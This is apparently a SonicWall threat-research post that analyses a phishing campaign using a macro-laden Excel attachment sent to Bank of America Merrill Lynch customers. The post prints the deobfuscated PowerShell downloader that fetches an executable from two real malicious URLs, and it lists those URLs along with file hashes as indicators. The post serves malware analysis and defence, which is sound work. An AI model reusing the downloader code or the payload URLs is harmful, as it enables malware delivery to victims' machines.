New Phishing campaign targets Bank of America Merrill Lynch customers

By

SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch, however the email includes a malicious Excel attachment. The Excel document has VBA macros, which when enabled, downloads and runs a malicious payload Win32.Trojan.

Infection Cycle:

Phishing email is the most effective attack vector, as exploit kits are no longer the preferred attack mode for hackers. In this phishing campaign, Bank of America Merrill Lynch customers are being targeted with a custom attack. All these fake emails come from the domain ‘bofamail.com’ not the real ‘bankofamerica.com’. The sender in these emails pretends to be a real employee from Bank of America as we see an online profile in the same name working in the southern California branch. However the Newport branch address and phone number doesn’t match.

Upon launching the excel attachment, a prompt appears with the message –  “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once enabled, the macro downloads a malicious payload and the payload gets into action immediately.

The VBA code is locked by password.

After unlocking the VBA project by tweaking the binary, we see the form (shown below) with encoded value in its fields.

VBA code:

VBA code is highly obfuscated to avoid static detection through signatures. It has the logic to retrieve the shell code from the above form.


Shell Code:

The shell code that’s retrieved is pasted below. It has gzip compressed and base64 encoded string.

PowerShell:

After applying decompression and base64 decoding on the above shell code, we get the below function that downloads the malicious payload either from hxxp://gba-llp.ca/za.liva or ‘hxxp://jamaicabeachpolice.com/za.liva’

function <#release#> tisel([string] $stri1)
{
 $tos1=1;
 try{
  (new-object system.net.webclient <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
 }
 catch{
  $tos1=0;
 }
return $tos1;
}

$men1=@('gba-llp.ca/za.liva','jamaicabeachpolice.com/za.liva');
foreach ($rix in $men1)
{
if(tisel('http://'+$rix) -eq 1){
break;
}
};

Hence upon enabling VB macro in the Excel document, shell command gets executed which then invokes Fileless PowerShell script to download and execute the malicious file.

The payload exhibits the following behaviors

  • Stops and deletes the Windows Defender service
  • Sets up Task Scheduler to run for every 10 minutes
  • Injects itself into the whitelisted process ‘svchost.exe’
  • Communicates with the C&C server periodically

Threat Graph:

Sonicwall Capture Labs Threat Research team provides protection against this with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)

Hashes:

Email:
fed01a32dab1e3ab1eba4b2bfa542219a63b0777608717ad0ba5c5e0c66ec928
336cc2145bc27105906023089264593dcf9ddc99bb4a61af6760920efa97a6f4
f5e923ee210a88c6f02eac9c66ec116e49c964b6e6402124ed02462c69f46e0f
d0582f03ea259bc4d33aa77942b7a4d4ce8163e022ede4dcea9c81d802910321

Excel:
f22c2f747d77d57c14f6e81433691bd1b79f0fde1e111b4c4a90aac278b23654

Payload:
32c58040d3d6ec5305a1a0ebb48ba05aebe3ac2f905a7f152f32fc9170e16711

Payload Url:
http://gba-llp.ca/za.liva
http://jamaicabeachpolice.com/za.liva

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.